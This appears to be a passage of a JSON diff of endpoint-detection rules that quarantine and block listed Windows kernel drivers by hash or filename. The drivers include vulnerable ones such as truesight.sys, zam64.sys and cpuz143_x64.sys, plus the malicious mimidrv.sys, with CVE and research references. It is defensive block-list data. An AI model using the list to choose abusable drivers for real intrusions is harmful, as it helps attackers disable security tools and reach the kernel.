+ "id": "509a1e1d-2356-53af-a5ab-1c38a1ddff63",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492232Z",
+ "creation_date": "2026-03-23T11:45:31.492234Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492240Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "084f82fde42e6388de4ba807360d989deaf1777d89a87d1cb552ced6467b4287",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "509b5701-3fd2-53ca-b7df-85d01a5f7051",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827932Z",
+ "creation_date": "2026-03-23T11:45:31.827935Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827944Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "addf4de4bd00a4d1a928a3dc80cc508b4cac3c263567d4d1a336ce64c6c225dc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "509be2a1-0370-53e0-bea6-558647ac3a48",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819377Z",
+ "creation_date": "2026-03-23T11:45:30.819379Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819384Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91afa3de4b70ee26a4be68587d58b154c7b32b50b504ff0dc0babc4eb56578f4",
+ "comment": "Vulnerable Kernel Driver (aka VdBSv64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50a57743-81e7-5b86-8fa8-5915cc29a6ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143456Z",
+ "creation_date": "2026-03-23T11:45:31.143459Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143464Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37a68e0746a1fad05fdcaf42051f42c1cb06d0b71fa91ffc6bf633cb84128f02",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50a68351-931b-5f92-9e58-79c0ac11a0e8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615589Z",
+ "creation_date": "2026-03-23T11:45:29.615591Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615596Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb4e3aa888a779238b210d6406aa480f01d27ea28d20699b1ec29a59dae19913",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50a86e60-ac98-59df-9f41-b3fe65cbf697",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830350Z",
+ "creation_date": "2026-03-23T11:45:30.830352Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e7c3bbb2810bb71e48c92223e48ba9a7180d31ca81b3a848f0414ae3e8eb2d36",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50b22166-a1f3-5675-9f2e-01a8e92b4f32",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159421Z",
+ "creation_date": "2026-03-23T11:45:31.159423Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159429Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd16a8d8c15c3b5fc059c43b4cd46529a7f1803772f909794b4f4a1a0847f607",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50b6d9dd-cabf-5675-925e-ebfd464bf9ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457129Z",
+ "creation_date": "2026-03-23T11:45:30.457133Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457141Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f4b06327ffbec2a59725a57c357daf54ea2f58aef5dc7ff3f5370168af09fb0",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50b93558-3405-564e-aef1-4fcd42e868d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458429Z",
+ "creation_date": "2026-03-23T11:45:30.458433Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458449Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "748b6350472e21bab16497e4296794619dede7fcdb188fea1574f89498a2ff54",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50c049b8-1674-5649-8e59-c9587aca0ff7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822708Z",
+ "creation_date": "2026-03-23T11:45:30.822711Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822717Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b2f669c6fb1e839ba146b416021ddfb7bf4785558113e11ac2c8a0e3399f338",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50c3b7ca-1615-5742-956b-298405b29fb2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487052Z",
+ "creation_date": "2026-03-23T11:45:31.487055Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487064Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7cac5ec96dfcddba9045d401c22cf18f4c3bfda60ae5183b183b3621bdcda778",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50c9b1f7-a48d-5313-8d87-542715d6f45d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479301Z",
+ "creation_date": "2026-03-23T11:45:31.479305Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479315Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2acf75a9b834ff3999c218e5a803876e181e9e0ed6d77174ef9a9e889d82bb03",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50c9b6fb-64ff-5927-bf8f-6a6995dcc3d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971449Z",
+ "creation_date": "2026-03-23T11:45:29.971452Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971459Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de8f8006d8ee429b5f333503defa54b25447f4ed6aeade5e4219e23f3473ef1c",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50d4ce18-40d0-52c2-b056-967b7612a942",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616761Z",
+ "creation_date": "2026-03-23T11:45:29.616765Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616773Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bee62b69023212a5a964d323f60e5858d7cbd767a39f3d5ef87cacb080b1dbf2",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50d61605-fffa-5ceb-9cda-dc176d79320b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984321Z",
+ "creation_date": "2026-03-23T11:45:29.984323Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984328Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2d83ccb1ad9839c9f5b3f10b1f856177df1594c66cbbc7661677d4b462ebf44d",
+ "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50e07033-dc05-55b0-bfee-cf675b326890",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479923Z",
+ "creation_date": "2026-03-23T11:45:30.479927Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479933Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae9b7b6d688de9b7b5be8b4b4d61207b23a143818d4609426f0d53b6f09be9a2",
+ "comment": "Vulnerable AMD uProf Kernel Driver (aka AMDCpuProfiler.sys) [CVE-2023-20562] [https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50ebee9a-879b-5d19-b71a-b523edbcf350",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610689Z",
+ "creation_date": "2026-03-23T11:45:29.610691Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610697Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9a523854fe84f15efc1635d7f5d3e71812c45d6a4d2c99c29fdc4b4d9c84954c",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50ef8b09-3be3-52d3-9a51-569670b1470c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464312Z",
+ "creation_date": "2026-03-23T11:45:30.464316Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464325Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e8ec06b1fa780f577ff0e8c713e0fd9688a48e0329c8188320f9eb62dfc0667f",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "50f54ee8-6b3b-5e7e-aab4-e8e4cee35d92",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607091Z",
+ "creation_date": "2026-03-23T11:45:29.607093Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607099Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "filename",
+ "value": "PROCEXP.SYS",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51007e20-bf30-596c-a5c6-6ac742352c26",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493034Z",
+ "creation_date": "2026-03-23T11:45:31.493037Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493046Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "32030e49c352a25e3d373617dc58a267cb068e93196001340cb61d6537d9b7a3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51079775-6177-595d-be5c-3974fa6bc666",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147983Z",
+ "creation_date": "2026-03-23T11:45:31.147985Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147991Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1682b9bccf2ec3d397dc439a5bb6d986cd938bd63e8c9b7ed4c0512a7d71a6d9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5108c865-7cff-5506-ba82-809ac78a6eb6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808266Z",
+ "creation_date": "2026-03-23T11:45:31.808269Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808278Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "253f80e82f61e3dcf07f1a9fa55ac826323648c169f1df21e3e0e6335b13178c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "511220d1-c511-5b77-800b-b240c13d5533",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
